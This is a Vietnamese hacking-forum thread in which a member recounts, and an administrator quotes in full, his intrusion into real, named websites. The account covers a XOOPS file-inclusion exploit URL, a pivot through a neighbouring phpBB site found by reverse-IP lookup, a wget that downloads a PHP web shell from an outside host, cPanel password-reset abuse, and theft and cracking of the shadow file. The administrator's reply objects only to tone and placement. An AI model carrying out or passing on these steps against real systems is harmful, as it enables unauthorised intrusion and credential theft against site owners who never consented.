English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Góp ý và Hỏi đáp thắc mắc chung ùmh ! Thắc mắc mong được giải đáp !  XML
  [Question]   ùmh ! Thắc mắc mong được giải đáp ! 25/07/2006 10:31:28 (+0700) | #1 | 9740
[Avatar]
 nhocbmt
Member
[Minus]    0    [Plus]
Joined: 26/06/2006 17:55:21
Messages: 75
Location: Ban Mê City
Offline
[Profile] [PM] [WWW]
vì anh conmale nói :


Nếu cần góp ý thì tạo một chủ đề riêng cho góp ý. Không nên "PS" ở cuối một bài viết kỹ thuật để phàn nàn.
 


nên em mạo muổi mở 1 topic mới để hõi vậy !

Như em đã nói hồi bữa em có post bài " How i hack pleikucity.net " nhưng ko hiểu sao bị move vào tán gẫu .... !

anh conmale nói :


nó đáng nằm ở box tán gẫu vì nội dung của bài viết hoàn toàn không có cái gì là thâm nhập cả.
 


Vậy cho em hõi về thâm nhập 1 chút , xin phép cho em lấy cái pleikucity.net làm ví dụ luôn :

Bắt đầu : em ko có bất cứ quyền hạn gì trên website đó và em đã cố gắng để chiếm đoạt toàn quyền điều khiển website đó ----> thành công !

Dậy thì có được gọi là " thâm nhập " ko ạ ?????

Bây giờ em sẽ đề cập vào nội dung bài viết !

Đúng là mới đầu bài viết có "kết bài hơi đã kích vniss" nhưng sau khi bro prof nhắc nhở em đã edit ngay !

conmale wrote:

nó đáng nằm ở box tán gẫu vì nội dung của bài viết hoàn toàn không có cái gì là thâm nhập cả.
 


Tóm tắt lại nội dung bài viết :


Mục tiêu : Pleikucity.net
Thông tin đã có về mục tiêu : Sài shared hosting ( *"3.gif"* ) , Saì Open Source XOOPS ....

Inclusion file bug (misc.php):

Code:
include_once XOOPS_ROOT_PATH.'/language/'.$xoopsConfig['language'].'/misc.php';


whois.sc/pleikucity.net ----> reverse IP ---> 350 Results for 67.15.40.4 (Pleikucity.net)

hừhm hừhm... ! lt chọn phpBB là mục tiêu vì phpBB có nhiều bug rất củ chuối có thể remote được cả shell .. !

lụm được khoảng gần chục em sài phpBB .. chọn đại 1 thằng.. và lt chọn : http://www.sickpuppyrecords.com/

kkhì khì ! loay hoay đâu khoảng 10 phút langtu đã có 1 shell ảo trên host nó thông qua bug remote include file ! híc ! Và việc bây giờ là phải làm sao up được 1 con remv php lên host để tiện cho việc sữ dụng sau này ! OKies
Code:
ls -al

thấy folder uploads của nó chmod 777 nên ta sẽ up vào đó ! nhưng up nếu up trực tiếp = file .php thì sẽ ko được .. vì *nix ko chấp nhận ! như vậy ta dùng :
Code:
cd /uploads

Code:
wget haylam.com/xxx/c98.zip

unzip : Code:
unzip c98.zip


bây giờ thữ xem :

http://www.sickpuppyrecords.com/phpBB/uploads/c98.php

đã thành công smilie Vì mới nãy ta up thông qua exploit của forum nên ta cũng có owner tương đương với user của nó là : sickpupp/sickpupp

Code:
cat /home/sickpupp/.contactemail


OKies ! tiến hành forgot pass login vào Cpanel ! hehe ! Có 1 Cpanel rồi lt tính chơi trò forgot tiếp để vào thằng Pleiku nhưng ko được ,Cpanel đã fix!

Vào ftp up lên con cgi-telnet rồi "ln " shadow file ra ! OK ! đã ln được shadow file .. nhưng chỉ có root mới sài nó được ( điều dĩ nhiên ) ! Lợi dụng bug của Cpanel ... loay hoay 1 hồi đã có file shadow trên máy !

Crack ko ra pass root và pass của user pleiku !

quay lại con cgi-telnet mới nãy mới up :
Code:
ls -al /home/pleiku/public_html/html/


folder uploads của nó chmod 777 , up 1 em c98 lên... ! Up thành công ---> nhưng bị error 500 , dù up file perl hay php ! Nghĩ đi nghĩ lại sao lại error 500 ?? Phải chăng serv này PHP chạy dưới dạng CGI ??? chắc là thía rồi ! híc !
Với lại owner của mình là sickpupp/sickpupp mà lại up sang chỗ của thằng pleiku/plieku ... liệu có được ko ?? vì còn noob nên bỏ qua vấn đề này !

Còn nhớ mới nãy ta thấy XOOPS có 1 bug inclusion file ko ???
hí hí ! Chính hắn !

rename con c98 của mình lại thành : misc.php up lên folder uploads của nó rồi open browser lên :

Code:
http://www.pleikucity.net/html/misc.php?xoopsOption%5bnocommon%5d=1&xoopsConfig%5blanguage%5d=../uploads


owner là pleiku/pleiku

 


Liệu câu nói của anh conmale :

conmale wrote:

nó đáng nằm ở box tán gẫu vì nội dung của bài viết hoàn toàn không có cái gì là thâm nhập cả.
 


có chính xác lắm ko ????

vài ý kiến
-nhocbmt
[Up] [Print Copy]
  [Question]   ùmh ! Thắc mắc mong được giải đáp ! 25/07/2006 21:56:05 (+0700) | #2 | 9854
[Avatar]
 conmale
Administrator
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Anh xin thay mặt BQT trả lời những thắc mắc như sau:

nhocbmt wrote:
vì anh conmale nói :


Nếu cần góp ý thì tạo một chủ đề riêng cho góp ý. Không nên "PS" ở cuối một bài viết kỹ thuật để phàn nàn.
 


nên em mạo muổi mở 1 topic mới để hõi vậy !
 

Tốt và nên làm như thế.

nhocbmt wrote:

Như em đã nói hồi bữa em có post bài " How i hack pleikucity.net " nhưng ko hiểu sao bị move vào tán gẫu .... !

anh conmale nói :


nó đáng nằm ở box tán gẫu vì nội dung của bài viết hoàn toàn không có cái gì là thâm nhập cả.
 

 

Anh không rõ bài nguyên thuỷ như thế nào nhưng khi xem bài này trong box tán gẫu thì post đầu tiên của em chẳng có cái gì gọi là thâm nhập cả. Trọn bộ thread toàn là chit chat, cãi cọ. Có lẽ mod nào đã dời bài này vào box tán gẫu vì tính chất lộn xộn, cãi cọ, khích bác của nó. Đáng lẽ ra, bài này phải bị xoá nếu chiếu theo nội quy.

nhocbmt wrote:

Vậy cho em hõi về thâm nhập 1 chút , xin phép cho em lấy cái pleikucity.net làm ví dụ luôn :

Bắt đầu : em ko có bất cứ quyền hạn gì trên website đó và em đã cố gắng để chiếm đoạt toàn quyền điều khiển website đó ----> thành công !

Dậy thì có được gọi là " thâm nhập " ko ạ ?????
 

Nếu bài viết tập trung vào thâm nhập với ngôn ngữ và thái độ nghiêm túc thì nó có giá trị và được lưu giữ. Thậm chí, nó có thể được dời vào box "Các bài viết giá trị" nếu nó thật sự có giá trị.

Thâm nhập thì có triệu cách thâm nhập và bài viết được đón xem một cách nghiêm túc hay không là ở thái độ và ngôn ngữ của bài viết.

nhocbmt wrote:

Bây giờ em sẽ đề cập vào nội dung bài viết !

Đúng là mới đầu bài viết có "kết bài hơi đã kích vniss" nhưng sau khi bro prof nhắc nhở em đã edit ngay !

conmale wrote:

nó đáng nằm ở box tán gẫu vì nội dung của bài viết hoàn toàn không có cái gì là thâm nhập cả.
 


Tóm tắt lại nội dung bài viết :


Mục tiêu : Pleikucity.net
Thông tin đã có về mục tiêu : Sài shared hosting ( *"3.gif"* ) , Saì Open Source XOOPS ....

Inclusion file bug (misc.php):

Code:
include_once XOOPS_ROOT_PATH.'/language/'.$xoopsConfig['language'].'/misc.php';


whois.sc/pleikucity.net ----> reverse IP ---> 350 Results for 67.15.40.4 (Pleikucity.net)

hừhm hừhm... ! lt chọn phpBB là mục tiêu vì phpBB có nhiều bug rất củ chuối có thể remote được cả shell .. !

lụm được khoảng gần chục em sài phpBB .. chọn đại 1 thằng.. và lt chọn : http://www.sickpuppyrecords.com/

kkhì khì ! loay hoay đâu khoảng 10 phút langtu đã có 1 shell ảo trên host nó thông qua bug remote include file ! híc ! Và việc bây giờ là phải làm sao up được 1 con remv php lên host để tiện cho việc sữ dụng sau này ! OKies
Code:
ls -al

thấy folder uploads của nó chmod 777 nên ta sẽ up vào đó ! nhưng up nếu up trực tiếp = file .php thì sẽ ko được .. vì *nix ko chấp nhận ! như vậy ta dùng :
Code:
cd /uploads

Code:
wget haylam.com/xxx/c98.zip

unzip : Code:
unzip c98.zip


bây giờ thữ xem :

http://www.sickpuppyrecords.com/phpBB/uploads/c98.php

đã thành công smilie Vì mới nãy ta up thông qua exploit của forum nên ta cũng có owner tương đương với user của nó là : sickpupp/sickpupp

Code:
cat /home/sickpupp/.contactemail


OKies ! tiến hành forgot pass login vào Cpanel ! hehe ! Có 1 Cpanel rồi lt tính chơi trò forgot tiếp để vào thằng Pleiku nhưng ko được ,Cpanel đã fix!

Vào ftp up lên con cgi-telnet rồi "ln " shadow file ra ! OK ! đã ln được shadow file .. nhưng chỉ có root mới sài nó được ( điều dĩ nhiên ) ! Lợi dụng bug của Cpanel ... loay hoay 1 hồi đã có file shadow trên máy !

Crack ko ra pass root và pass của user pleiku !

quay lại con cgi-telnet mới nãy mới up :
Code:
ls -al /home/pleiku/public_html/html/


folder uploads của nó chmod 777 , up 1 em c98 lên... ! Up thành công ---> nhưng bị error 500 , dù up file perl hay php ! Nghĩ đi nghĩ lại sao lại error 500 ?? Phải chăng serv này PHP chạy dưới dạng CGI ??? chắc là thía rồi ! híc !
Với lại owner của mình là sickpupp/sickpupp mà lại up sang chỗ của thằng pleiku/plieku ... liệu có được ko ?? vì còn noob nên bỏ qua vấn đề này !

Còn nhớ mới nãy ta thấy XOOPS có 1 bug inclusion file ko ???
hí hí ! Chính hắn !

rename con c98 của mình lại thành : misc.php up lên folder uploads của nó rồi open browser lên :

Code:
http://www.pleikucity.net/html/misc.php?xoopsOption%5bnocommon%5d=1&xoopsConfig%5blanguage%5d=../uploads


owner là pleiku/pleiku

 


Liệu câu nói của anh conmale :

conmale wrote:

nó đáng nằm ở box tán gẫu vì nội dung của bài viết hoàn toàn không có cái gì là thâm nhập cả.
 


có chính xác lắm ko ????

vài ý kiến
-nhocbmt 

Xét về mặt kỹ thuật, nếu bài viết trên có nội dung y hệt như đã post trước khi bị dời vào box tán gẫu thì nó có thể được giữ ở box "thâm nhập". Tuy nhiên vì lối dùng từ và nội dung của nó có lẽ đã gây những bài tham gia khác mang tính bài xúc hơn là một topic nghiêm túc.

Nếu bài viết được chỉnh sửa lại câu cú, ngôn từ cho đàng hoàng và post lại trong box "Thâm nhập" thì hợp lý và chẳng có gì phải bàn cãi cả.

Câu nói "nó đáng nằm ở box tán gẫu vì nội dung của bài viết hoàn toàn không có cái gì là thâm nhập cả" chỉ cho tình trạng bài viết đã được điều chỉnh, đã dời vào box tán gẫu ngay thời điểm anh xem nó trong box tán gẫu. Bởi thế, câu nhận định trên hoàn toàn chính xác.

Góp ý cho nhocbmt rút kinh nghiệm: để mình được nể, việc đăng dăm bài "thâm nhập" chẳng có bao nhiêu tác dụng nếu như cách trình bày, cách dùng từ không đủ nghiêm túc. Bởi thế, em nên rút kinh nghiệm cho lần sau và không riêng gì trên diễn đàn HVA này.

Thân mến.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|